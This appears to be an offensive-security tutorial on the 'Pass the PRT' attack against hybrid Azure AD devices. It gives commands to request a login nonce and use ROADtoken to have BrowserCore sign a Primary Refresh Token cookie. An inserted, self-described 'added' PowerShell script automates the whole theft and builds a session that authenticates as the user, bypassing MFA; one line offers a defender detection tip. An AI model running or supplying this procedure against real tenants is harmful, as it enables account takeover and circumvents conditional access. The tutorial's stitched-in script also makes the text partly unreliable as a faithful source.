Pass the PRT
This attack targets devices with Azure AD SSO enabled in hybrid Azure environments. A Primary Refresh Token (PRT) can be used to authenticate to any application; it carries the device claims and, if the user originally signed in with MFA, an MFA claim, so it satisfies conditional access policies that require MFA or a compliant/hybrid-joined device without a new prompt.
This attack leverages the BrowserCore component that is natively present on devices with SSO enabled: the Windows Accounts browser extension talks to BrowserCore.exe, which generates and signs a PRT cookie on the user's behalf. Generating the cookie requires a server nonce, so the attacker first initiates an SSO request to obtain a nonce and then pipes the request to BrowserCore to get a signed PRT cookie out of it. Note that what comes out is not the raw PRT (that stays protected inside LSASS) but a signed cookie bound to the nonce, which login.microsoftonline.com accepts in its place.
To perform the attack we'll use an awesome tool called ROADtoken, but Mimikatz can be used as well. Checking whether SSO is enabled on a host is as simple as running
dsregcmd /status
The AzureAdJoined and AzureAdPrt fields should both be set to YES.
If the host satisfies these conditions we can go ahead and request a session nonce
PS /home/otter> $TenantId = "<tenant_id>"
PS /home/otter> $url = "https://login.microsoftonline.com/$TenantId/oauth2/token"
PS /home/otter> $params = @{
>> "URI" = $url
>> "Method" = "POST"
>> }
PS /home/otter> $body = @{
>> "grant_type" = "srv_challenge"
>> }
PS /home/otter> $result = Invoke-RestMethod @params -UseBasicParsing -Body $body
PS /home/otter> $result.Nonce
With the nonce value we can request the signed PRT cookie
PS /home/otter> .\ROADToken.exe "<nonce>"
This returns a JSON object with an x-ms-RefreshTokenCredential field. Its value is a signed JWT that is set as a cookie of the same name on login.microsoftonline.com to authenticate as the user. The cookie embeds the nonce it was issued for and is short-lived, so use it promptly.
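The whole procedure above (precondition check, nonce request, ROADtoken call, cookie extraction) as one script. This is an added example, not code from the original page or from the ROADtoken project. It assumes ROADtoken.exe is in the current directory and that it prints BrowserCore's JSON reply, whose "response" array holds entries with "name" and "data" fields; the decoded claim names (refresh_token, is_primary, request_nonce) are the ones normally seen in a PRT cookie and are checked leniently.

```powershell
# Added example (not from the page or ROADtoken): end-to-end Pass-the-PRT
# on a hybrid-joined Windows host. Assumptions: ROADtoken.exe is in the
# current directory and prints BrowserCore's JSON reply; <tenant_id> is a
# placeholder supplied by the operator.
param(
    [Parameter(Mandatory)][string]$TenantId,
    [string]$RoadToken = ".\ROADtoken.exe"
)

# 1. Precondition: the host must be Azure AD joined and hold a PRT.
$status  = dsregcmd /status
$joined  = [bool]($status | Select-String '^\s*AzureAdJoined\s*:\s*YES')
$hasPrt  = [bool]($status | Select-String '^\s*AzureAdPrt\s*:\s*YES')
if (-not ($joined -and $hasPrt)) {
    throw "AzureAdJoined and AzureAdPrt must both be YES on this host."
}

# 2. Ask the token endpoint for a server nonce (grant_type=srv_challenge).
$nonceParams = @{
    Uri    = "https://login.microsoftonline.com/$TenantId/oauth2/token"
    Method = 'POST'
    Body   = @{ grant_type = 'srv_challenge' }
}
$nonce = (Invoke-RestMethod @nonceParams -UseBasicParsing).Nonce
if (-not $nonce) { throw "Token endpoint returned no nonce." }

# 3. Hand the nonce to ROADtoken, which asks BrowserCore to sign a PRT cookie.
$raw = & $RoadToken $nonce | Out-String
# Assumption: the JSON reply is the last thing printed; keep from its first '{'.
$start = $raw.IndexOf('{')
if ($start -lt 0) { throw "ROADtoken printed no JSON: $raw" }
$reply  = $raw.Substring($start) | ConvertFrom-Json
$cookie = ($reply.response | Where-Object { $_.name -eq 'x-ms-RefreshTokenCredential' }).data
if (-not $cookie) { throw "No x-ms-RefreshTokenCredential in BrowserCore reply." }

# 4. Decode the JWT payload (base64url, no signature check) to see what the
#    cookie carries: the encrypted PRT, the is_primary flag and the nonce.
function ConvertFrom-Base64Url([string]$Text) {
    $s = $Text.Replace('-', '+').Replace('_', '/')
    switch ($s.Length % 4) { 2 { $s += '==' } 3 { $s += '=' } }
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s))
}
$claims = ConvertFrom-Base64Url ($cookie.Split('.')[1]) | ConvertFrom-Json
if ($claims.request_nonce -and $claims.request_nonce -ne $nonce) {
    Write-Warning "Cookie nonce ($($claims.request_nonce)) differs from the requested nonce."
}

# 5. Build a web session that presents the cookie to login.microsoftonline.com;
#    any request to the login endpoint through this session authenticates as
#    the device's user without an interactive sign-in.
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$session.Cookies.Add(
    (New-Object System.Net.Cookie('x-ms-RefreshTokenCredential', $cookie, '/', 'login.microsoftonline.com'))
)

[pscustomobject]@{
    Nonce      = $nonce
    Cookie     = $cookie
    IsPrimary  = $claims.is_primary
    HasPrt     = [bool]$claims.refresh_token
    Session    = $session
}
```

Run it as `.\Invoke-PassThePrt.ps1 -TenantId <tenant_id>` (the file name is an assumption) from a user session on the joined host; the returned object carries the cookie for the browser or for a tool that consumes PRT cookies, and the session for further PowerShell requests. From the defender's side, note that BrowserCore.exe is normally started by the browser, so a copy spawned by a console or script parent, as this flow does, is the process-tree anomaly to hunt for.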
As mentioned, this attack can also be pulled off with Mimikatz. The process is longer, but it gives a better overview of how the browser component builds the cookie from the PRT and its session key.
To know more about the process I suggest reading this post.